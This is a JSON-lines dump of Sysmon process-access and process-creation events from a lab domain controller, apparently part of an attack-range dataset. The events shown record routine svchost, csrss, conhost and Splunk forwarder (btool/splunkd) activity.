{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100EE40300}\r\nTargetProcessId: 3964\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100EE40300}","TargetProcessId":"3964","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.442\r\nProcessGuid: {E2A3D6B1-106E-5F25-0000-0010C6E40300}\r\nProcessId: 3976\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106E-5F25-0000-00100EE40300}\r\nParentProcessId: 3964\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.442","ProcessGuid":"{E2A3D6B1-106E-5F25-0000-0010C6E40300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106E-5F25-0000-00100EE40300}","ParentProcessId":"3964","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-106E-5F25-0000-00100EE40300}\r\nSourceProcessId: 3964\r\nSourceThreadId: 3960\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-0010C6E40300}\r\nTargetProcessId: 3976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100EE40300}","SourceProcessId":"3964","SourceThreadId":"3960","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-0010C6E40300}","TargetProcessId":"3976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-0010C6E40300}\r\nTargetProcessId: 3976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-0010C6E40300}","TargetProcessId":"3976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
